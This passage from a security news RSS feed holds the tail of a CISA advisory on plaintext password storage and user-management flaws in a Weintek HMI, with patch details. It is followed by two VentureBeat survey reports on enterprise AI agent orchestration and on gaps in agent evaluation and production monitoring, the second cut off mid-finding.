<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-61886</a></h3>
<div class="csaf-accordion-content">
<p>Weintek cMT3092X HMI stores user account passwords in plaintext.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-61886">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Weintek cMT3092X</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Weintek</div>
<div class="ics-version"><strong>Product Version:</strong><br>Weintek cMT3092X firmware: &lt;20210218, Weintek EasyWeb: &lt;v2.1.20</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Weintek recommends users apply the patch package named cmt_typeB_20260316_007.patch, which contains a newer EasyWeb 2.3.17-typeb. This fix will be delivered as a patch-only update; no separate standard firmware release is planned. Users may request the patch directly from Weintek support (https://www.weintek.com/globalw/Support/Knowledge.aspx) or from distributors.<br><a href="https://www.weintek.com/globalw/Support/Knowledge.aspx">https://www.weintek.com/globalw/Support/Knowledge.aspx</a></p>
<p><strong>Mitigation</strong><br>Weintek has published a document with more details about this issue at https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf.<br><a href="https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf">https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/256.html">CWE-256 Plaintext Storage of a Password</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
<tr>
<td>4.0</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-60135</a></h3>
<div class="csaf-accordion-content">
<p>An attacker can modify data that should be restricted to read‑only access.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-60135">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Weintek cMT3092X</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Weintek</div>
<div class="ics-version"><strong>Product Version:</strong><br>Weintek cMT3092X firmware: &lt;20210218, Weintek EasyWeb: &lt;v2.1.20</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Weintek recommends users apply the patch package named cmt_typeB_20260316_007.patch, which contains a newer EasyWeb 2.3.17-typeb. This fix will be delivered as a patch-only update; no separate standard firmware release is planned. Users may request the patch directly from Weintek support (https://www.weintek.com/globalw/Support/Knowledge.aspx) or from distributors.<br><a href="https://www.weintek.com/globalw/Support/Knowledge.aspx">https://www.weintek.com/globalw/Support/Knowledge.aspx</a></p>
<p><strong>Mitigation</strong><br>Weintek has published a document with more details about this issue at https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf.<br><a href="https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf">https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/286.html">CWE-286 Incorrect User Management</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N</a></td>
</tr>
<tr>
<td>4.0</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Vincenzo Giuseppe Colacino of Secoore reported these vulnerabilities to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take the following measures to protect themselves from social engineering attacks:</p>
<p>Practice principles of least privilege.</p>
<p>Do not click web links or open attachments in unsolicited email messages.</p>
<p>Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.</p>
<p>Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-07-23</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-07-23</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic orchestration: Enterprise AI organizations have a deployment problem, not a platform problem — and most are calling chatbots agents]]></title>
<description><![CDATA[Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agen...]]></description>
<link>https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agents” are still chatbot wrappers, the control plane enterprises expect is deliberately hybrid to avoid lock-in, and real-time fiscal control over token burn remains the exception.</p><p>This wave of VentureBeat Pulse Research examines enterprise agent orchestration: which platforms enterprises run on, what drives the choice, what they optimize for, how they expect agent control to be structured, and — most revealingly — how orchestrated their deployed “agents” actually are and how tightly they control the cost of running them.</p><p>The central finding is a gap between orchestration ambition and orchestration reality. Enterprises are consolidating fast onto the major model platforms: Anthropic’s Claude is the primary platform for 40%, more than double any rival, followed by Microsoft (18%) and OpenAI (13%). The choice is driven by “model gravity” — native alignment with a state-of-the-art base model (21%) — and success is judged by reliable, multi-step execution (task completion reliability 32%, multi-step workflow management 28%). Yet asked to assess their portfolios honestly, 71% say a quarter or fewer of their deployed “agents” are true multi-step orchestrated workflows rather than single-prompt chatbot wrappers, and only 10% have crossed the halfway mark. The orchestration layer is being built well ahead of the orchestrated portfolio it is meant to run.</p><p>That gap shapes the architecture enterprises are putting in place. By the end of 2026 a clear majority (51%) expect a hybrid control plane — provider-native plus external orchestration — and only 6% expect to hand control to a provider-managed service, because vendor lock-in (35%) is the risk they fear most if control lives inside a model provider. Investment follows the build-out: agent workflow tooling leads the spend (34%), with security and permissions enforcement (25%) behind. And fiscal control lags throughout — more than a quarter (27%) have no real-time way to stop a runaway agent before the bill arrives.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on enterprise agent orchestration. Responses are filtered to organizations with 100 or more employees (n=101), drawn from a single June 2026 wave; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends.</p><p>By organization size the sample is spread evenly across the enterprise bands: 100–499 employees, 2,500–9,999, and 50,000+ (21% each), with 10,000–49,999 and 500–2,499 (19% each). By role it is senior and buyer-credible: product and program managers (15%), CIO/CTO/CISO (13%), consultants and advisors (13%), and a spread of data, AI, and engineering directors and VPs, with an “Other” function at 18%. On purchasing, 81% are recommenders, influencers, or final decision-makers for AI solutions (66% recommender/influencer, 15% final decision-maker). Technology/Software is the largest industry at 44%, followed by Financial Services (17%) and Healthcare/Life Sciences (8%).</p><p>At 101 respondents the sample is robust enough to read directionally with reasonable confidence, though it remains self-selected and is not a probability sample.</p><h2>Finding 1: Orchestration runs on model-provider platforms</h2><p><b>Anthropic’s Claude leads; open frameworks are marginal</b></p><p>We asked which agent orchestration platform enterprises primarily use today. The answer concentrates on the major model providers — and on one in particular.</p><div></div><p>A note on reading these shares. As described in the methodology section, the respondents are self-selected, and this question asked them for a single primary platform — so the figures measure which platform leads each enterprise's deployment, within a self-selected audience of AI-active technical decision-makers. A sample built this way can diverge substantially from spend-weighted market measures, and each VB Pulse survey draws its own sample with its own company-size mix, so vendor figures should not be compared across our surveys either. Read these shares as a portrait of where this cohort has placed its primary orchestration bet today, rather than as market share.</p><p>The model platforms dominate. Anthropic, Microsoft, OpenAI, Google, and Amazon together account for roughly 80% of deployments (81 of 101), while the open frameworks (LangChain/LangGraph) and custom in-house builds that anchor engineering discussion sit in single digits. Anthropic’s lead — 40%, more than double the next platform — mirrors the “model gravity” selection logic in Finding 2: enterprises are choosing the orchestration layer that comes with the model they want to build on. As with the security vendors in the prior agent-security wave, the tools that define the category in technical circles are not yet where enterprise deployment concentrates. A small 3% are not orchestrating at all.</p><p>Respondents rate the platforms they run at 3.94 out of 5 overall (109 answered), with “value for money” specifically at 3.94 and “ease of implementation” the weakest score, at 3.85 — placing orchestration near the bottom of our five-tracker satisfaction range, ahead of only evaluation tooling. A rating just under 4 out of 5, from users of whom 96% plan to change their orchestration approach within the year, reads as provisional acceptance: the platforms work well enough to run today, and not well enough to stop the search for something better. The ratings sit alongside near-universal intent to change; this is a layer enterprises tolerate more than they love.</p><h2>Finding 2: Model gravity drives platform selection</h2><p><b>The base model, not the tooling, decides the platform</b></p><p>We asked what most influenced the orchestration platform choice. The single largest factor is the pull of the underlying model — though flexibility and ease of development follow close behind.</p><div></div><p>Model gravity leading is the selection-side explanation for Anthropic’s platform lead: enterprises pick the orchestration environment closest to the frontier model they have standardized on. But the next tier complicates the picture — flexibility across models and tools (17%) and ease of development (17%) say enterprises also want to avoid being trapped by that choice, foreshadowing the lock-in fear in Finding 6. Security and permissions (14%) and total cost of ownership (11%) round out a pragmatic buying logic. Performance (latency/memory) sits last at 4%, a reminder that at this stage of adoption the binding constraints are model fit and optionality, not raw speed.</p><h2>Finding 3: The job is reliable multi-step execution</h2><p><b>Enterprises just orchestration by whether it completes the work</b></p><p>We asked what enterprises optimize for — their primary success metric for orchestration. Reliability and multi-step workflow management dominate; developer- and user-facing metrics trail.</p><div></div><p>Task completion reliability (32%) and multi-step workflow management (28%) together account for 59% of responses (60 of 101): orchestration succeeds, in the enterprise view, when it reliably carries a task through multiple steps to completion. Developer productivity (17%) matters but is secondary — the inverse of its prominence in framework discussion — and end-user experience (9%) is a minor concern, consistent with orchestration being an internal execution problem rather than a UX one. This reliability-first standard is exactly what makes the Chatbot Trap finding so pointed: enterprises define success as dependable multi-step execution, yet most of their deployed “agents” do not yet do multi-step work at all.</p><p>The trap is not evenly distributed. Splitting the sample by organization size, 77% of smaller enterprises say a quarter or fewer of their agents do true multi-step work, against 62% of larger ones. Larger enterprises are meaningfully further into genuine multi-step deployment; the chatbot trap is, directionally, a mid-market condition.</p><h2>Finding 4: Consolidate, productionize, and build in-house </h2><p><b>Three strategic moves are nearly tied for the year ahead</b></p><p>We asked what major change enterprises anticipate in their orchestration strategy over the next 12 months. Three moves cluster at the top, almost evenly split.</p><div></div><p>The top three — building in-house control (25%), standardizing on one framework (24%), and moving agents from sandbox to production (23%) — are statistically indistinguishable and tell a single story: enterprises are moving from experimentation to operational consolidation. They want fewer frameworks, more production exposure, and more ownership of the control layer; only 4% expect no change. The appetite for custom in-house control planes is notable alongside the platform concentration in Finding 1 — enterprises are standardizing on model-provider platforms while simultaneously planning to wrap them in control logic they own, the hybrid posture that Finding 6 makes explicit.</p><h2>Finding 5: Nearly seven in 10 plan to switch — and the biggest group of movers has no shortlist </h2><p>The strategic change enterprises anticipate (previous finding) comes with vendor motion attached. Asked whether they plan to adopt a new, additional, or replacement agent orchestration platform in the next twelve months, more respondents are moving here than in any other layer we track.</p><div></div><p>Asked which platforms they are considering, the most common answer among those in motion is none yet: 29% of all respondents are evaluating without a shortlist, the largest single response after "not considering a change." Among named candidates, OpenAI leads at 16%, followed by LangChain/LangGraph at 12% and Anthropic at 7% — and notably, the independent frameworks draw roughly double their current usage footprint in forward consideration, the same pattern our security tracker found for specialist vendors. Read with this report's concentration and lock-in findings, the picture completes itself: the major model-platform providers hold roughly four-fifths of today's primary usage, vendor lock-in has become the leading fear, 96% anticipate a strategic change — and now the purchase intent to act on all of it, with the largest bloc of buyers still undecided. The most concentrated layer of the agentic stack is also, as of June, the least settled.</p><h2>Finding 6: Investment flows to workflow tooling</h2><p><b>Tooling and permissions lead the spend; monitoring trails</b></p><p>We asked which orchestration-related investment will grow most next year. Agent workflow tooling leads, with security and permissions enforcement behind.</p><div></div><p>Workflow tooling leading (34%) is the budget-side expression of the reliability-and-multi-step priority in Finding 3: the money is going to the machinery that strings steps together dependably. Security and permissions enforcement (25%) and scaling infrastructure (20%) follow — the investments required to take agents from sandbox into production, the strategic move in Finding 4. Monitoring and debugging draws a smaller 11%, with another 11% reporting flat budgets. The weight on tooling, permissions, and scaling over pure observability signals that enterprises are spending to build and harden orchestration, not merely to watch it run.</p><h2>Finding 7: The control plane will be hybrid — and lock-in is why</h2><p><b>Enterprises expect to split control between providers and their own layer</b></p><p>We asked where enterprises expect the primary control plane for agents to live by the end of 2026, and what worries them most if that control sits inside a model-provider platform. A clear majority expect a hybrid model — and vendor lock-in is the reason.</p><div></div><p>Hybrid control is the dominant expectation by a wide margin (51%), and only 6% expect to hand control to a provider-managed service outright. Read together, the hybrid, custom, and externally-abstracted options — every architecture that keeps control at least partly outside the provider — sum to 88% (89 of 101). The reason surfaces directly when we asked about the risk of provider-resident control: vendor lock-in leads at 35% (35 of 101), ahead of security and permissioning limitations (28%) and inflexibility across models and tools (21%). The pattern echoes the prior wave’s “don’t trust the model to police itself” posture — here, enterprises will build on a provider’s platform but decline to be governed entirely by it. The hybrid control plane is the architectural hedge against the lock-in they most fear.</p><p>The June figure asserting a preference for a hybrid control plane marks movement from earlier. In the April–May survey (n=145), only 34% expected a hybrid control plane, and a greater number (12%) expected to hand control fully to a provider-managed service. These two snapshots don’t yet measure a confirmed longitudinal trend — but the direction of the conversation is unambiguous: toward keeping control.</p><p>Lock-in is also a new arrival as a top concern. In the April–May wave, the leading concern was security and permissioning limitations (32%), with lock-in second at 24%; by June the two had traded places. The worry about provider platforms appears to be maturing from whether they can be secured to whether they can be replaced.</p><h2>Finding 8: The chatbot trap — most “agents” aren’t agents yet</h2><p><b>Enterprises admit most deployments are still chatbot wrappers</b></p><p>We asked enterprises to assess their portfolios honestly: what share of their deployed “agents” are true multi-step orchestrated workflows versus simple single-prompt chatbot wrappers. The answer is the defining finding of this wave.</p><div></div><p>This is the gap at the center of the report. Combining the bottom two bands, 71% of enterprises (72 of 101) say a quarter or fewer of their deployed “agents” are genuinely orchestrated — and just 10% (10 of 101) have crossed the halfway mark. The ambition documented in the earlier findings — model-provider platforms, reliability-first success metrics, production rollouts, a deliberate control architecture — runs well ahead of the deployed reality, which remains overwhelmingly single-prompt assistants dressed as agents. This is less a contradiction than a roadmap: the platforms, budgets, and strategies are being put in place precisely because the orchestrated portfolio is still so thin. The open question for later waves is how fast the reality closes on the ambition.</p><h2>Finding 9: Fiscal control is still reactive</h2><p><b>Only a minority can stop a runaway agent before the bill arrives</b></p><p>Finally, we asked how enterprises enforce fiscal control over agent token consumption — the risk that an autonomous loop exhausts a budget before anyone intervenes. Most rely on native caps or after-the-fact monitoring; real-time programmatic control is the exception.</p><div></div><p>More than a quarter of enterprises (27%) admit they have no real-time, programmatic way to stop an agent before a budget-breaking bill arrives — they learn of it from the logs afterward. Another 32% lean entirely on the native caps and throttles built into their primary platform, a control only as good as the provider’s tooling and one that ties back to the lock-in concern of Finding 6. The enterprises building custom gateways (23%) or exploiting cross-model routing to arbitrage cost (19%) are the ones treating token burn as an engineering problem to be controlled deterministically. As with orchestration maturity, fiscal control is an area where the operational reality lags the ambition: agents are moving toward production faster than the cost-control plane around them is being built.</p><p>It’s worth noting, a split appears according to company size: roughly one in three enterprises under 2,500 employees (34%) exercises only reactive control of agent spend, against 20% of larger enterprises — directional figures, but consistent with the chatbot-trap split. The mid-market is running the least mature agents on the least instrumented budgets.</p><h2>The bottom line: The layer is real; most of the agents aren't yet</h2><p>Organizations with 100 or more employees describe an orchestration strategy that is consolidating quickly and maturing slowly. They are standardizing — for now — on model-provider platforms, which collectively hold roughly four-fifths of primary usage, chosen for the gravity of the underlying model, and they judge success by reliable multi-step execution. Investment is flowing to workflow tooling and permissions, the strategy is to consolidate frameworks and push agents into production, and the control plane they expect is deliberately hybrid, because vendor lock-in is the risk they fear most. But the standardization is provisional: 68% plan to adopt a new, additional, or replacement orchestration platform within twelve months — the highest switching intent of any layer we track — and the largest group of those movers has not yet shortlisted a candidate. Today's concentration describes where enterprises are, and visibly does not describe where they intend to stay.</p><p>But the honest self-assessment punctures the ambition. Seventy-one percent say a quarter or fewer of their deployed "agents" are truly orchestrated, only 10% are past the halfway mark, and more than a quarter cannot stop a runaway agent in real time. The orchestration layer — the platforms, the budgets, the control architecture — is being built ahead of the orchestrated portfolio it is meant to run. At 101 respondents in a single June wave this reads as a clear directional signal rather than a precise measurement: enterprises have decided how they want to orchestrate agents well before most of their agents are doing anything an orchestration layer is for. The questions for subsequent waves are whether the deployed reality closes the gap on the ambition — and, with nearly seven in ten buyers in motion and most of them undecided, which platforms the settled stack finally lands on.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. Because this is one wave rather than a pooled multi-month sample, results read directionally rather than as a confirmed trend. Respondents include product and program managers, CIOs, CTOs and CISOs, consultants and advisors, and directors and VPs of data, AI, and engineering, across Technology/Software, Financial Services, Healthcare, and other sectors.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The agent evaluation gap: Enterprise AI organizations have a reality-alignment problem, not a coverage problem — and most are shipping to production anyway]]></title>
<description><![CDATA[Across 157 enterprises, organizations are granting AI agents more autonomy while trusting the evaluations meant to gate that autonomy less. Half have already shipped an agent that passed their internal evaluations and then failed a customer in production; only one in twenty fully trusts automated...]]></description>
<link>https://tsecurity.de/de/3689829/it-nachrichten/the-agent-evaluation-gap-enterprise-ai-organizations-have-a-reality-alignment-problem-not-a-coverage-problem-and-most-are-shipping-to-production-anyway/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689829/it-nachrichten/the-agent-evaluation-gap-enterprise-ai-organizations-have-a-reality-alignment-problem-not-a-coverage-problem-and-most-are-shipping-to-production-anyway/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 157 enterprises, organizations are granting AI agents more autonomy while trusting the evaluations meant to gate that autonomy less. Half have already shipped an agent that passed their internal evaluations and then failed a customer in production; only one in twenty fully trusts automated evaluation today; and the most-cited weakness is that evaluations do not align with real-world outcomes. Yet two-thirds already allow, or are actively engineering toward, deploying agent changes to production on automated evaluation alone — with no human in the loop. The result is an evaluation gap — the distance between how much autonomy enterprises are handing their agents and how far they trust the tests that are supposed to catch the failures.</p><p>This wave of VentureBeat Pulse Research examines how technical leaders measure agent performance: which reliability and evaluation platforms they use, how they select and trust them, what breaks in production, and how far they are willing to let agents run without a human in the loop.</p><p>The central finding is an evaluation gap — the distance between the autonomy enterprises are granting their agents and the trust they place in the evaluations meant to govern it. Half of organizations (50%) have, in the past year, deployed an agent or LLM feature that passed their internal evaluations and then caused a customer-facing failure, and a quarter have seen it happen more than once. Trust in the tests themselves is thin: only 5% say they fully trust automated evaluation today, and the single most-cited limitation is that evaluations align poorly with real-world outcomes (29%). Enterprises are discovering that a passing eval is not the same as a working agent.</p><p>What makes the gap consequential is the direction of travel. Two-thirds of organizations (66%) already permit fully automated, zero-human-in-the-loop deployment for low-risk agents (34%) or are actively engineering their pipelines to allow it within twelve months (33%). At the same time, the evaluation stack that would have to earn that trust is fragmented and immature: the most common primary tools are the model providers’ native evals, tied with having no dedicated tooling at all (17% each); and only about a quarter of enterprises run real-time quality checks on live production traffic. The autonomy is arriving faster than the assurance.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this survey — the Agentic Reliability &amp; Evals tracker — focused on how technical leaders evaluate agent performance and reliability. Responses are filtered to organizations with 100 or more employees (n=157), drawn from a single survey in June 2026; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends. Where questions were multiple-select, those shares can sum to more than 100%.</p><p>By role the sample is senior and buyer-credible: 38% are final decision-makers for AI purchases and another 34% recommenders or influencers. Product and program managers (15%), consultants and advisors (10%), directors of engineering/IT (8%), and CIOs/CTOs/CISOs (8%) lead the named titles, alongside a large “Other” function (37%). By organization size the sample is mid-market-weighted: 100–499 (37%) and 500–2,499 (27%) employees lead, with 2,500–9,999 (20%), 10,000–49,999 (10%), and 50,000+ (6%) above them. Technology/Software is the largest industry at 23%, followed by Retail/Consumer (15%), Healthcare/Life Sciences (12%), and Manufacturing (10%).</p><p>At 157 respondents the sample is large enough to read directionally but should be treated as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It skews toward the mid-market, so it is best read as the view from organizations actively standing up agent evaluation practices rather than from the largest operators.</p><p><i>Note: This survey was rebuilt for the June wave from the earlier “LLM observability and evaluations” survey; because the questions and sample differ, no comparisons are made to the April–May data.</i></p><h1>Finding 1: A passing eval is not a working agent</h1><p><b>Half have shipped an agent that passed evals, then failed a customer</b></p><p>We asked whether, in the past 12 months, organizations had deployed an agent or LLM feature that passed their internal evaluations but then caused a customer-facing failure. Half of those that run evaluations had.</p><div></div><p>This is the report’s defining number. Half of organizations (50%) have shipped an AI feature that cleared their internal evaluations and then failed in front of a customer — an incorrect output, a broken workflow, or a quality incident — and a quarter have seen it happen more than once. Only 36% report no such failure, and the remainder either run no pre-deployment evaluations (8%) or don’t track the root cause closely enough to know (6%). The failure is precise and expensive: the evaluation said the agent was ready, and it was not. Everything that follows — how enterprises trust their evals, what they monitor, and how much autonomy they grant — is shaped by this experience.</p><h2>Finding 2: Almost no one fully trusts automated evaluation</h2><p><b>The top complaint: Evals don't match real-world outcomes</b></p><p>We asked which limitation most reduces trust in automated agent evaluations today. Only a sliver of enterprises had no complaint at all.</p><div></div><p>Trust in automated evaluation is scarce, and specific. Only 5% of organizations say they fully trust automated evaluation as it stands — meaning 95% name a limitation that holds them back. The most common, at 29%, is the one that most directly explains Finding 1: evaluations align poorly with real-world outcomes, passing agents that later fail. Bias or inconsistency (21%) and a lack of explainability (18%) follow — enterprises cannot always tell why an evaluation reached its verdict — and 17% cite data-leakage or privacy concerns in the evaluation process itself. The tests meant to certify agents are not yet trusted to certify them, which is precisely why the autonomy trajectory in Finding 3 is so striking.</p><h2>Finding 3: The autonomy ceiling is rising anyway</h2><p><b>Two-thirds already allow, or are building toward, zero-human deployment</b></p><p>We asked whether organizations would let an autonomous agent deploy a code or system change to production on automated evaluation results alone, with no human-in-the-loop validation. The trajectory runs straight through the trust gap.</p><div></div><p>Here is the paradox at the heart of the report. Even though almost no one fully trusts automated evaluation (Finding 2), two-thirds of organizations (66%) either already allow zero-human-in-the-loop deployment for low-risk agents (34%) or are actively engineering their pipelines to permit it within a year (33%). Only 22% rule it out for the foreseeable future. The direction is unambiguous: enterprises are moving to let evaluations gate production autonomously — removing the human check — at the same moment they say those evaluations don’t reliably match reality. The autonomy ceiling is rising faster than the assurance beneath it, which is the mechanism by which the false-confidence failures of Finding 1 will scale rather than shrink.</p><p>Notably, the autonomy bet is not just a small company phenomenon. Splitting the sample by company size, larger enterprises are slightly further down the path toward zero human review than smaller companies (70% versus 64%) and slightly more likely to have shipped an evaluation-passing agent that then failed a customer (54% versus 48%). The assumption that large, regulated organizations are holding the human in the loop longest is, in this sample, backwards.  To be sure, these are directional figures, since the survey was not a huge sample — 57 respondents from companies with 2,500+ employees and 100 from companies smaller than that. </p><h2>Finding 4: The evaluation stack is fragmented and provider-led</h2><p><b>Provider-native evals lead — tied with no dedicated tool at all</b></p><p>We asked which agent reliability or evaluation platform enterprises primarily use today. The market has no clear leader — and a large share has nothing dedicated.</p><div></div><p>The evaluation layer is early and unconsolidated. Provider-native tooling leads — OpenAI’s native evals and traces (17%) and Anthropic’s Claude Console evals (13%) together outweigh any independent platform — but it is tied at the top by a striking answer: 17% of enterprises use no dedicated agent-evaluation tooling at all, a notable gap for organizations shipping agents to customers. The specialist evaluation vendors — DeepEval (12%), Braintrust (8%), LangSmith, Weave, Promptfoo, Langfuse, Arize — are scattered across single to low double digits, and 11% have built their own. No independent platform has yet become the category standard, which leaves most enterprises evaluating agents with provider-native tools, home-grown scripts, or nothing.</p><h2>Finding 5: Production monitoring rarely watches output quality</h2><p><b>Only a quarter run real-time quality checks on live traffic</b></p><p>Production monitoring for an AI agent can watch two very different things. It can watch whether the system is <b>functioning</b> — is the agent up and responding, did each request complete, how fast, at what cost, with any errors. Or it can watch whether the agent's output is <b>correct</b> — automated checks that evaluate the content of each answer as it goes out: did the agent give the right answer, take the right action, stay within policy. The distinction matters because a confidently wrong answer is invisible to the first kind of monitoring: the request completes, the response is fast, no error is thrown, and every functioning-metric reads healthy. We asked organizations which kind their live production monitoring is built for today.</p><div></div><p>Grouped by what is actually being watched, the split is stark: 51% of organizations monitor only whether the agent is functioning, while 23% monitor whether its answers are right. 